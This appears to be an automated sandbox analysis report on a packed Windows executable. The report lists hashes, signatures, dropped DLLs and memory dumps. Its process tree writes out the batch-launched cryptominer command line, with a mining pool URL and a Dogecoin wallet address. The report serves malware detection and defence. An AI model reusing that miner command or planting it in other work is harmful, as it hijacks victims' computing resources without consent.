73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
296s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13/02/2024, 06:30

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2724	b2e.exe
2204	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2204	cpuminer-sse2.exe
2204	cpuminer-sse2.exe
2204	cpuminer-sse2.exe
2204	cpuminer-sse2.exe
2204	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/512-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 512 wrote to memory of 2724	512	batexe.exe	74
PID 512 wrote to memory of 2724	512	batexe.exe	74
PID 512 wrote to memory of 2724	512	batexe.exe	74
PID 2724 wrote to memory of 584	2724	b2e.exe	75
PID 2724 wrote to memory of 584	2724	b2e.exe	75
PID 2724 wrote to memory of 584	2724	b2e.exe	75
PID 584 wrote to memory of 2204	584	cmd.exe	78
PID 584 wrote to memory of 2204	584	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:512
- C:\Users\Admin\AppData\Local\Temp\A21C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\A21C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A21C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A3D1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:584
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A21C.tmp\b2e.exe

Filesize
2.2MB

MD5
b6a558633dc13e01c86f714214bdd894

SHA1
95921cb72467d2a69885d7987fa6990ed3756e81

SHA256
85cd30b679653b5cc0ca0c6cb9e56e841122391168a2237121da79b28b9fd507

SHA512
d55e570830a21e8ffe9d7a769576afce67fa05396d4450818bfa45132e1f10e5bf8f10026e9fa621f0451f8908d7c9bff9590f64a85d5048af173f5e529aa7c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\A21C.tmp\b2e.exe

Filesize
1.6MB

MD5
1e9446ffe80055b0d0681a975585d4f2

SHA1
e2b13091250549c39e6156044d3d826cfa7cc936

SHA256
6a5e65eb48e3c9f4a594a64b60d57436418cec87e75c9cf93d55746ef761e17c

SHA512
fc3ca72c1070ad153cb9f99b6a1665efb80d83005f575d70437af8d87164bff1c689305570feb80d84889a31fdc0ee1b375576fa9594ee303c2ab0776bf0e2fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\A3D1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
379KB

MD5
7c1e04b04d24a646b0cd4f401f51ab45

SHA1
9eff993e6dc5dbe862b8b2e0d09affd9ef266d23

SHA256
c438738de303ced16ab7cfd908f5994530e112e3a05ad8dfd9a381fbdadff92d

SHA512
2f8f74f63d62e957f65b0bd7977a8e0e88b27b2c13e408ba1663b489339cdccaba3b054505d70e9eb3543280c135e06a488b78e177d190b7e39ff71afd71928d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
256KB

MD5
e0c023f2dc80d8f2415830dcaf9b9e45

SHA1
9806d1f4bd0f76e044071f95f9210b09c2c09fd0

SHA256
dc7de4210ed002ed6ab8340d21f999fd77ff9c1fe4361227ebbe3324b24009a0

SHA512
76d594de32b07899a478e6b1fbe4a158492174439df3a65478b21135aea9695f47cd6b5006d1bb28398fb1b1f0e64f33e839ae16225fe755bcec4d25d3caf0ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
296KB

MD5
a4da49298bc6b0f1c128f53502525f8d

SHA1
82b78dde6b9c0e4288ae7a5532490c12f7fc326f

SHA256
3a20b3508236b6609b508c65a7d5b59c1d424ee382ee50a8700d01717396a74f

SHA512
3817a71dfde6ac09af2e184b315f0f71ee791a80bfd54fb2934edb59de0a9250f3754a7e74b4f165bcfadb96c3fb4afe4960f49f2f3b999c955d4fb583ec3a0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
418KB

MD5
0fe8b398dd42b8492782ef238a3cff0c

SHA1
dba08b5373aadc5451f1658cb5eeaf442595dc9f

SHA256
20bab086a80cad54a497fcb610c82205b643d9dc691a1afe56258d72d78a7d12

SHA512
2a3ad4a89f193dffd89226c7c10b133f68eb87a3baa8061ca1825326f1ec233e1c3b96d75bcfcca2f9fe528af887787f6878404b4382e4088ca273808fa06ec8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
128KB

MD5
9746d1ac79c8b499d8b2224394581fa7

SHA1
36b1985eabfd8131ad9f2b7f69c903a3fce67629

SHA256
77941fbe96e0c797e6cf5419ee32bd3fcee69629cba37750146656a660c37182

SHA512
61a6174e2aced5b85cd614ad2f9d3da24c6b91e1fc04e10ff818222c4323cd043a59708bd35af0de84b004bf492fbc157d72907cd1e7ddf7082fc2a3563ef183

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
301KB

MD5
a32dd82b5ca115685784988865392a45

SHA1
3ca3694f8816452c3a3e33e7e1af5fc5c0f08532

SHA256
9b95a8189fd9e5f8038863981205c8b8d2ead89467418d1dca552f100e91bd85

SHA512
07a4287ee261b2759596993f26ab4b53a2aa05d0e7a171c87e898362dc5716ac00948dd684e7d8ef0a35ff2d21da56f4e6310816023d62e152120f3e8de90802

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
324KB

MD5
ff8928165e669118e65d23e4798103de

SHA1
28a4379e68de8d76c06e3a54d92139fdf755eae5

SHA256
c6f7236dd0f230bd2e752e00b0328118d833ac66617f94defc086a4bd3bc3d84

SHA512
68ace38917b9ffebf191262f8834ae04c4314950ae4b3bb5d0bc07ca6a730917212b81278b98e35b96c739edfef1c81ada92051b2c0856868a4283c29f63328c

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
309KB

MD5
c7547dfd0f4614237de777a92aee1a24

SHA1
5d4934a834bdbdcc1a72e55e83ca2f760d5e3d7e

SHA256
a192ccbb2a76f209f1729c4ae5b6cd925f47b6063ed13b062f3c7e9624732f42

SHA512
45b405d6c7af4b4c957be9f2ddc07d59c4fb770ffc22b86ec1868e009d050d7e2b3436f0cf144c33b869c58cb2441656a270e74b1c7f14449dfa074e019a8eae

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
188KB

MD5
b564e804cc36f748a02bc9bf2f357128

SHA1
4dc36440d211b665540f0e6e30c54d33bad7ddda

SHA256
8a28ebe3a640c2584a33e5c54bf02a5d9615a6502f403db85b891698cf3cbc91

SHA512
ec22cff361c58c02cd9c99507f4cb2448765191c2b2e9d500236d6cc244201826e235f40cb0cafac2d051fddcd4ae97421d5d161af193364ea9a60c6ba54a9b1

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
268KB

MD5
eee7eee134563cf23397995156cd4737

SHA1
42d8d02aad058c18ab7ae44a3d6e46ad5e57e348

SHA256
8db5160ffc857d75be17a1e48b96502a2d464d402092b170f9a3a72fc10211e4

SHA512
8a97a1996b563003f8fb78d26bf169ede5d5eed9ccc9b7a77e0d101b1e205ca25a14e3eebefc10408910ac28b0bee8712ce9f47fbb401d4f0213afeefe42b44f

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
344KB

MD5
84ad568dd337c01fe81c5f1c1a87d11e

SHA1
2d1c4db31b6cf5cef9ad1a74bef20b4d744cc75e

SHA256
071982d225984de82d1ea43e59673769e81e46197a8548ba8a7c7e1ad3687886

SHA512
5f6dc104d686ea4c048cc22773c5bbe2ef3d5910eebad42408358b0030899167444dc7f1b91b418127cdd57cdac7e0aa420c3b739e86e91835f9546a5586c3d0

Download Submit
memory/512-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2204-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2204-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2204-43-0x000000005D6A0000-0x000000005D738000-memory.dmp

Filesize
608KB

Download
memory/2204-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2204-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2724-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2724-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download